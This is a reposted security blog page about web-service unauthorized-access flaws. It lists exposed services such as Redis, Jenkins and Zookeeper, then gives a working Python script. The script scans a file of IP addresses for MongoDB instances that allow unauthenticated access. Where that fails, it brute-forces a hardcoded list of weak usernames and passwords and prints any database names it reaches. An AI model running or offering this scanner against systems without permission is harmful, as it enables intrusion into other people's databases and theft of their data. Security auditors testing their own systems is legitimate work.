Application Security - Web Security - Unauthorized Access Roundup

Hadoop
Solr
Hudson
Jenkins
memcache
Couchdb
ES
redis
rsync
Zookeeper
JBOSS

Script

# MongoDB
# -*- coding:utf-8 -*-

import pymongo
from pymongo.errors import ServerSelectionTimeoutError

def verify(ip, port):
    host = ip + ':' + str(port)
    port = int(port)
    loginnames = ['admin','test','user','root']
    passwd = ['','123456','test','12345678','12345679','root','123456Aa','123456_Aa','123456aA','123456_aA','123QWEASD','admin123','admin','1q2w3e4r','134679']
    print('testing if mongodb vul')
    # Check whether the server accepts unauthenticated access
    try:
        connection = pymongo.MongoClient(ip, port, serverSelectionTimeoutMS=1000)
        # list_database_names() replaces database_names(), which PyMongo 4 removed
        dbs = connection.list_database_names()
        msg = 'There is a mongodb unauthorized access , password is None'
        number = 'v9'
        print(dbs)
        return True, host, number, msg
    # Port unreachable: exit immediately
    except ServerSelectionTimeoutError as e:
        msg = str(e)
        number = 'v0'
        return False, host, number, msg
    except Exception as e:
        msg = str(e)
        number = 'v0'
    # Brute force the weak username/password list
    for loginname in loginnames:
        for ps in passwd:
            try:
                # Database.authenticate() was removed in PyMongo 4, so pass the
                # credentials to MongoClient; authSource keeps the original 'api' database
                client = pymongo.MongoClient(ip, port, username=loginname, password=ps,
                                             authSource='api', serverSelectionTimeoutMS=1000)
                dbs = client.list_database_names()
                # Two placeholders are needed here; the original single %s raised a TypeError
                msg = 'There is a mongodb unauthorized access , username/password is %s/%s' % (loginname, ps)
                number = 'v9'
                print(msg)
                return True, host, number, msg
            except Exception as e:
                msg = str(e)
                number = 'v0'
    return False, host, number, msg

def get_pass_dict():
    # Despite its name, this reads the target IP list, one address per line
    pass_dict = []
    with open('./IP.txt', 'r') as f:
        for line in f:
            line = line.strip()
            if line:
                pass_dict.append(line)
    return pass_dict

if __name__ == '__main__':
    IP = get_pass_dict()
    for ip in IP:
        port = '27017'
        res = verify(ip, port)
        print(res)
 


 

 

Reposted from: https://www.cnblogs.com/AtesetEnginner/p/11038269.html
